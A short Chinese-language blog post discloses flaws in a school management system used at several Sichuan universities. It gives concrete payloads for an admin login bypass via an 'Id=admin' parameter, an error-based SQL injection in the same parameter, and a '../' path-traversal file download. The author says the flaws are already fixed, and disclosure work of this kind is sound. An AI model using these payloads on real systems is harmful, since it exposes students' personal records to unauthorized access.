某建站系统版本漏洞,影响四川多高校,泄露几万学生数据

发表于 | 分类于 | 浏览
字数统计: 221 字 | 阅读时长 ≈ 1 分钟

这也是对自己学校校园网测试的时候发现的,后来测试一下发现是通杀。

越权

http://xxx/Sys/OneLogin.aspx?Id=admin

Id参数可控,导致越权,可以直接输入admin登陆管理后台。

后台功能很多,包括但不仅限于 删除违纪数据,查看学生信息(精确到床位),学生调班等。

点击学号还可以查看更详细的数据

并且支持导出

注入

越权点也是个注入点

http://xxx/Sys/OneLogin.aspx?Id=admin ' and 1=convert(int,(user)) and 'a'='a

任意文件下载

http://ip/Sys/SystemForm/DownloadFile.aspx?DownUrl=../Sys/SystemForm/DownloadFile.aspx

DownUrl指定的目录是/WebDown/….

/WebDown/ 和 /Sys 是同级目录,构造payload即可下载任意文件,没检验后缀,也没检验文件类型

影响高校

这些高校漏洞在文章发布前已全部修复。